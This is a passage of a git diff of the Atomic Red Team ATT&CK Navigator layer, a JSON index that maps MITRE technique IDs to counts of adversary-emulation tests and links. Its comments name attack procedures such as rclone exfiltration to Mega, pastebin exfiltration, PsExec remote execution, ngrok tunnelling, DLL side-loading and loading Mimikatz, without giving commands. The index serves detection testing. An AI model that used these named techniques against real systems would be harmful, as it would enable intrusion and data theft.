Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 35163a6d68..73e9ecac00 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View 